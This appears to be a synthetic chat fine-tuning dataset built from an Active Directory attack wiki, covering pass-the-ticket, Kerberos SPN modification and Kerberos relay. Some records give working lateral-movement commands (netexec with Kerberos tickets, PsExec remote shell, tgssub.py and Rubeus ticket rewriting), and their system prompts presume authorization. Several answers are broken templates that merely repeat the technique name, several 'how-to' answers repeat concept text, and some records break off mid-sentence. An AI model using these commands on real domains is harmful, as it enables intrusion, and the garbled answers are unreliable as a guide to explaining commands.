"augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the ticket - Passing the ticket"}, {"role": "assistant", "content": "netexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the ticket - Passing the ticket", "response": "netexec winrm $TARGETS -k -x whoami\nnetexec smb $TARGETS -k -x whoami", "metadata": {"corpus_index": 689, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec winrm $TARGETS -k -x whoami`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec winrm $TARGETS -k -x whoami`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 689, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Pass the ticket - Passing the ticket?"}, {"role": "assistant", "content": ".\\PsExec.exe -accepteula \\\\$TARGET cmd"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Pass the ticket - Passing the ticket?", "response": ".\\PsExec.exe -accepteula \\\\$TARGET cmd", "metadata": {"corpus_index": 690, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `.\\PsExec.exe -accepteula \\\\$TARGET cmd`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - passing the ticket. Passing the ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `.\\PsExec.exe -accepteula \\\\$TARGET cmd`?", "response": "This command is used for pass the ticket - passing the ticket. Passing the ticket", "metadata": {"corpus_index": 690, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Pass the ticket - Modifying the SPN"}, {"role": "assistant", "content": "When requesting access to a service, a Service Ticket is used. It contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These pieces of information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.\n\nAnother information stored in the ST, outside of the PAC, and unprotected, called sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.\n\nThere are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.\n\n::: tabs\n\n=== UNIX-like\n\nThis technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket (Impacket tries to change the service class to something else, and calls this \"AnySPN\").\n\nImpacket's tgssub.py script can also be used for manual manipulation of the service name value. _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding this script is pending._\n\n``bash\ntgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"\n`\n\n=== Windows\n\nWith Rubeus, it can be conducted by supplying the /altservice flag when using the s4u or the tgssub modules and the whole SPN can be changed (service class and/or hostname).\n\n`powershell\nRubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Pass the ticket - Modifying the SPN", "response": "When requesting access to a service, a Service Ticket is used. It contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These pieces of information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.\n\nAnother information stored in the ST, outside of the PAC, and unprotected, called sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.\n\nThere are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.\n\n::: tabs\n\n=== UNIX-like\n\nThis technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket (Impacket tries to change the service class to something else, and calls this \"AnySPN\").\n\nImpacket's tgssub.py script can also be used for manual manipulation of the service name value. _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding this script is pending._\n\n``bash\ntgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"\n`\n\n=== Windows\n\nWith Rubeus, it can be conducted by supplying the /altservice flag when using the s4u or the tgssub modules and the whole SPN can be changed (service class and/or hostname).\n\n`powershell\nRubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"\n``\n\n:::", "metadata": {"corpus_index": 691, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pass the ticket - Modifying the SPN during a pentest?"}, {"role": "assistant", "content": "When requesting access to a service, a Service Ticket is used. It contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These pieces of information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.\n\nAnother information stored in the ST, outside of the PAC, and unprotected, called sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.\n\nThere are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.\n\n::: tabs\n\n=== UNIX-like\n\nThis technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket (Impacket tries to change the service class to something else, and calls this \"AnySPN\").\n\nImpacket's tgssub.py script can also be used for manual manipulation of the service name value. _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding this script is pending._\n\n``bash\ntgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"\n`\n\n=== Windows\n\nWith Rubeus, it can be conducted by supplying the /altservice flag when using the s4u or the tgssub modules and the whole SPN can be changed (service class and/or hostname).\n\n`powershell\nRubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pass the ticket - Modifying the SPN during a pentest?", "response": "When requesting access to a service, a Service Ticket is used. It contains enough information about the user to allow the destination service to decide to grant access or not, without asking the Domain Controller. These pieces of information are stored in a protected blob inside the ST called PAC (Privilege Attribute Certificate). In theory, the user requesting access can't tamper with that PAC.\n\nAnother information stored in the ST, outside of the PAC, and unprotected, called sname, indicates what service the ticket is destined to be used for. This information is basically the SPN (Service Principal Name) of the target service. It's split into two elements: the service class, and the hostname.\n\nThere are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). The problem here is that since the SPN is not protected, there are scenarios (e.g. services configured for constrained delegations) where the service class can be modified in the ticket, allowing attackers to have access to other types of services.\n\n::: tabs\n\n=== UNIX-like\n\nThis technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket (Impacket tries to change the service class to something else, and calls this \"AnySPN\").\n\nImpacket's tgssub.py script can also be used for manual manipulation of the service name value. _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding this script is pending._\n\n``bash\ntgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"\n`\n\n=== Windows\n\nWith Rubeus, it can be conducted by supplying the /altservice flag when using the s4u or the tgssub modules and the whole SPN can be changed (service class and/or hostname).\n\n`powershell\nRubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"\n``\n\n:::", "metadata": {"corpus_index": 691, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the tgssub.py command for pass the ticket - modifying the spn"}, {"role": "assistant", "content": "tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the tgssub.py command for pass the ticket - modifying the spn", "response": "tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"", "metadata": {"corpus_index": 692, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "tgssub.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the ticket - Modifying the SPN"}, {"role": "assistant", "content": "tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the ticket - Modifying the SPN", "response": "tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"", "metadata": {"corpus_index": 692, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - modifying the spn. Modifying the SPN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `tgssub.py -in ticket.ccache -out newticket.ccache -altservice \"cifs/target\"`?", "response": "This command is used for pass the ticket - modifying the spn. Modifying the SPN", "metadata": {"corpus_index": 692, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Rubeus.exe syntax for pass the ticket - modifying the spn?"}, {"role": "assistant", "content": "Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Rubeus.exe syntax for pass the ticket - modifying the spn?", "response": "Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"", "metadata": {"corpus_index": 693, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Pass the ticket - Modifying the SPN"}, {"role": "assistant", "content": "Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Pass the ticket - Modifying the SPN", "response": "Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"", "metadata": {"corpus_index": 693, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"`?"}, {"role": "assistant", "content": "This command is used for pass the ticket - modifying the spn. Modifying the SPN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe tgssub /altservice:cifs /ticket:\"base64 | ticket.kirbi\"`?", "response": "This command is used for pass the ticket - modifying the spn. Modifying the SPN", "metadata": {"corpus_index": 693, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Kerberos relay - Theory?"}, {"role": "assistant", "content": "Under certain conditions, an attacker can relay Kerberos authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain. It is essential to have a good understanding of the basic operation of the Kerberos protocol in order to understand relay attacks on it.\n\nThe aim is to relay an AP-REQ message (service access request with a Service Ticket), initiated by a client for one service, to another service. However, there is one crucial prerequisite: the targeted service and client must not apply encryption or signing, as we do not possess the secret (the session key) needed to perform these operations, as in the case of an NTLM relay attack.\n\nFurthermore, an AP-REQ message cannot be relayed to a service running under a different identity to the one initially requested by the client. So for the attack to succeed, we need to force the client to generate an AP-REQ for the target host and send it to us.\n\nIn Active Directory, the CLASS of the SPN (HTTP, CIFS, HOST, and so on) doesn't matter most of the time. This is because Windows services only check whether they can decrypt the ST transmitted via the AP-REQ, but do not check the class of service for which the ST was issued. Therefore, if a single account implements different services with different classes of service, this means that an ST issued for one class of service can be used to access all the other services running under the same account's identity."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Kerberos relay - Theory?", "response": "Under certain conditions, an attacker can relay Kerberos authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain. It is essential to have a good understanding of the basic operation of the Kerberos protocol in order to understand relay attacks on it.\n\nThe aim is to relay an AP-REQ message (service access request with a Service Ticket), initiated by a client for one service, to another service. However, there is one crucial prerequisite: the targeted service and client must not apply encryption or signing, as we do not possess the secret (the session key) needed to perform these operations, as in the case of an NTLM relay attack.\n\nFurthermore, an AP-REQ message cannot be relayed to a service running under a different identity to the one initially requested by the client. So for the attack to succeed, we need to force the client to generate an AP-REQ for the target host and send it to us.\n\nIn Active Directory, the CLASS of the SPN (HTTP, CIFS, HOST, and so on) doesn't matter most of the time. This is because Windows services only check whether they can decrypt the ST transmitted via the AP-REQ, but do not check the class of service for which the ST was issued. Therefore, if a single account implements different services with different classes of service, this means that an ST issued for one class of service can be used to access all the other services running under the same account's identity.", "metadata": {"corpus_index": 694, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Kerberos relay - Theory"}, {"role": "assistant", "content": "Under certain conditions, an attacker can relay Kerberos authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain. It is essential to have a good understanding of the basic operation of the Kerberos protocol in order to understand relay attacks on it.\n\nThe aim is to relay an AP-REQ message (service access request with a Service Ticket), initiated by a client for one service, to another service. However, there is one crucial prerequisite: the targeted service and client must not apply encryption or signing, as we do not possess the secret (the session key) needed to perform these operations, as in the case of an NTLM relay attack.\n\nFurthermore, an AP-REQ message cannot be relayed to a service running under a different identity to the one initially requested by the client. So for the attack to succeed, we need to force the client to generate an AP-REQ for the target host and send it to us.\n\nIn Active Directory, the CLASS of the SPN (HTTP, CIFS, HOST, and so on) doesn't matter most of the time. This is because Windows services only check whether they can decrypt the ST transmitted via the AP-REQ, but do not check the class of service for which the ST was issued. Therefore, if a single account implements different services with different classes of service, this means that an ST issued for one class of service can be used to access all the other services running under the same account's identity."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Kerberos relay - Theory", "response": "Under certain conditions, an attacker can relay Kerberos authentication to targets of his choosing. Depending on the mitigations in place, he will be able to move laterally and escalate privileges within an Active Directory domain. It is essential to have a good understanding of the basic operation of the Kerberos protocol in order to understand relay attacks on it.\n\nThe aim is to relay an AP-REQ message (service access request with a Service Ticket), initiated by a client for one service, to another service. However, there is one crucial prerequisite: the targeted service and client must not apply encryption or signing, as we do not possess the secret (the session key) needed to perform these operations, as in the case of an NTLM relay attack.\n\nFurthermore, an AP-REQ message cannot be relayed to a service running under a different identity to the one initially requested by the client. So for the attack to succeed, we need to force the client to generate an AP-REQ for the target host and send it to us.\n\nIn Active Directory, the CLASS of the SPN (HTTP, CIFS, HOST, and so on) doesn't matter most of the time. This is because Windows services only check whether they can decrypt the ST transmitted via the AP-REQ, but do not check the class of service for which the ST was issued. Therefore, if a single account implements different services with different classes of service, this means that an ST issued for one class of service can be used to access all the other services running under the same account's identity.", "metadata": {"corpus_index": 694, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Kerberos relay - Practice?"}, {"role": "assistant", "content": "Kerberos relay attacks are not as permissive as their NTLM versions. For the moment, only a few specific exploitation scenarios have been proven.\n\nIn particular, it is important to note that, due to stricter configuration of exchange signatures (particularly for the HTTP protocol), relays to the LDAP service are, for the time being, virtually impossible by default.\n\n> [!TIP]\n> For these reasons, Kerberos relay has no direct advantage over NTLM relay. Its advantage lies more in the fact that NTLM authentication can sometimes be disabled on the Active Directory domain, that the target service of the relay can only authorises Kerberos (for example, in the case of an AD CS web enrolment service that has been hardened), or that the client belongs to the Protected Users group.\n\nkrbrelayx (Python) and KrbRelayEx (C#) are great tools for relaying Kerberos authentications. Those tools setup relay clients and relay servers waiting for incoming authentications."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Kerberos relay - Practice?", "response": "Kerberos relay attacks are not as permissive as their NTLM versions. For the moment, only a few specific exploitation scenarios have been proven.\n\nIn particular, it is important to note that, due to stricter configuration of exchange signatures (particularly for the HTTP protocol), relays to the LDAP service are, for the time being, virtually impossible by default.\n\n> [!TIP]\n> For these reasons, Kerberos relay has no direct advantage over NTLM relay. Its advantage lies more in the fact that NTLM authentication can sometimes be disabled on the Active Directory domain, that the target service of the relay can only authorises Kerberos (for example, in the case of an AD CS web enrolment service that has been hardened), or that the client belongs to the Protected Users group.\n\nkrbrelayx (Python) and KrbRelayEx (C#) are great tools for relaying Kerberos authentications. Those tools setup relay clients and relay servers waiting for incoming authentications.", "metadata": {"corpus_index": 695, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Kerberos relay - Practice?"}, {"role": "assistant", "content": "Kerberos relay attacks are not as permissive as their NTLM versions. For the moment, only a few specific exploitation scenarios have been proven.\n\nIn particular, it is important to note that, due to stricter configuration of exchange signatures (particularly for the HTTP protocol), relays to the LDAP service are, for the time being, virtually impossible by default.\n\n> [!TIP]\n> For these reasons, Kerberos relay has no direct advantage over NTLM relay. Its advantage lies more in the fact that NTLM authentication can sometimes be disabled on the Active Directory domain, that the target service of the relay can only authorises Kerberos (for example, in the case of an AD CS web enrolment service that has been hardened), or that the client belongs to the Protected Users group.\n\nkrbrelayx (Python) and KrbRelayEx (C#) are great tools for relaying Kerberos authentications. Those tools setup relay clients and relay servers waiting for incoming authentications."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Kerberos relay - Practice?", "response": "Kerberos relay attacks are not as permissive as their NTLM versions. For the moment, only a few specific exploitation scenarios have been proven.\n\nIn particular, it is important to note that, due to stricter configuration of exchange signatures (particularly for the HTTP protocol), relays to the LDAP service are, for the time being, virtually impossible by default.\n\n> [!TIP]\n> For these reasons, Kerberos relay has no direct advantage over NTLM relay. Its advantage lies more in the fact that NTLM authentication can sometimes be disabled on the Active Directory domain, that the target service of the relay can only authorises Kerberos (for example, in the case of an AD CS web enrolment service that has been hardened), or that the client belongs to the Protected Users group.\n\nkrbrelayx (Python) and KrbRelayEx (C#) are great tools for relaying Kerberos authentications. Those tools setup relay clients and relay servers waiting for incoming authentications.", "metadata": {"corpus_index": 695, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Kerberos relay - Abuse from DNS poisoning"}, {"role": "assistant", "content": "Dirk-jan Mollema has demonstrated in this blog post that combining its mitm6 (Python) and krbrelayx (Python) tools, and DNS Start Of Authority (SOA) requests, it is possible to poison a client and force it to send an AP-REQ message for an arbitrary service, which can then be relayed. The following section is a summary of his blog post, and of James Forshaw's original article.\n\n> The DNS 'start of authority' (SOA) record stores important information about a domain or zone such as the email address of the administrator, when the domain was last updated, and how long the server should wait between refreshes.\n>\n> All DNS zones need an SOA record in order to conform to IETF standards. SOA records are also important for zone transfers.\n> \n> _(Cloudflare, source)_\n\nAn interesting service for relaying authentications is the AD CS HTTP service, which by default is vulnerable to relay attacks as it does not enforce signing with HTTP, allowing an ESC8 to be exploited via Kerberos from a mitm6 DNS poisoning.\n\nDNS is used in Kerberos authentication operations in Active Directory. In particular, it is used through Secure dynamic updates, which are used to keep DNS records synchronised with the IP addresses of dynamically addressed clients.\n\nTo summarise, the steps involved in such an exchange are as follows:\n\n> 1. The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.\n> 2. The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp.\n> 3. The client attempts a dynamic update on the A record with their name in the zone internal.corp.\n> 4. This dynamic update is refused by the server because no authentication is provided.\n> 5. The client uses a TKEY query to negotiate a secret key for authenticated queries.\n> 6. The server answers with a TKEY Resource Record, which completes the authentication.\n> 7. The client sends the dynamic update again, "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Kerberos relay - Abuse from DNS poisoning", "response": "Dirk-jan Mollema has demonstrated in this blog post that combining its mitm6 (Python) and krbrelayx (Python) tools, and DNS Start Of Authority (SOA) requests, it is possible to poison a client and force it to send an AP-REQ message for an arbitrary service, which can then be relayed. The following section is a summary of his blog post, and of James Forshaw's original article.\n\n> The DNS 'start of authority' (SOA) record stores important information about a domain or zone such as the email address of the administrator, when the domain was last updated, and how long the server should wait between refreshes.\n>\n> All DNS zones need an SOA record in order to conform to IETF standards. SOA records are also important for zone transfers.\n> \n> _(Cloudflare, source)_\n\nAn interesting service for relaying authentications is the AD CS HTTP service, which by default is vulnerable to relay attacks as it does not enforce signing with HTTP, allowing an ESC8 to be exploited via Kerberos from a mitm6 DNS poisoning.\n\nDNS is used in Kerberos authentication operations in Active Directory. In particular, it is used through Secure dynamic updates, which are used to keep DNS records synchronised with the IP addresses of dynamically addressed clients.\n\nTo summarise, the steps involved in such an exchange are as follows:\n\n> 1. The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.\n> 2. The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp.\n> 3. The client attempts a dynamic update on the A record with their name in the zone internal.corp.\n> 4. This dynamic update is refused by the server because no authentication is provided.\n> 5. The client uses a TKEY query to negotiate a secret key for authenticated queries.\n> 6. The server answers with a TKEY Resource Record, which completes the authentication.\n> 7. The client sends the dynamic update again, ", "metadata": {"corpus_index": 696, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/relay.md", "page_title": "Kerberos relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Kerberos relay - Abuse from DNS poisoning"}, {"role": "assistant", "content": "Dirk-jan Mollema has demonstrated in this blog post that combining its mitm6 (Python) and krbrelayx (Python) tools, and DNS Start Of Authority (SOA) requests, it is possible to poison a client and force it to send an AP-REQ message for an arbitrary service, which can then be relayed. The following section is a summary of his blog post, and of James Forshaw's original article.\n\n> The DNS 'start of authority' (SOA) record stores important information about a domain or zone such as the email address of the administrator, when the domain was last updated, and how long the server should wait between refreshes.\n>\n> All DNS zones need an SOA record in order to conform to IETF standards. SOA records are also important for zone transfers.\n> \n> _(Cloudflare, source)_\n\nAn interesting service for relaying authentications is the AD CS HTTP service, which by default is vulnerable to relay attacks as it does not enforce signing with HTTP, allowing an ESC8 to be exploited via Kerberos from a mitm6 DNS poisoning.\n\nDNS is used in Kerberos authentication operations in Active Directory. In particular, it is used through Secure dynamic updates, which are used to keep DNS records synchronised with the IP addresses of dynamically addressed clients.\n\nTo summarise, the steps involved in such an exchange are as follows:\n\n> 1. The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.\n> 2. The server responds with the DNS server that is authorative, in this case the DC icorp-dc.internal.corp.\n> 3. The client attempts a dynamic update on the A record with their name in the zone internal.corp.\n> 4. This dynamic update is refused by the server because no authentication is provided.\n> 5. The client uses a TKEY query to negotiate a secret key for authenticated queries.\n> 6. The server answers with a TKEY Resource Record, which completes the authentication.\n> 7. The client sends the dynamic update again, "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Kerberos relay - Abuse from DNS poisoning", "response": "Dirk-jan Mollema has demonstrated in this blog post that combining its mitm6 (Python) and krbrelayx (Python) tools, and DNS Start Of Authority (SOA) requests, it is possible to poison a client and force it to send an 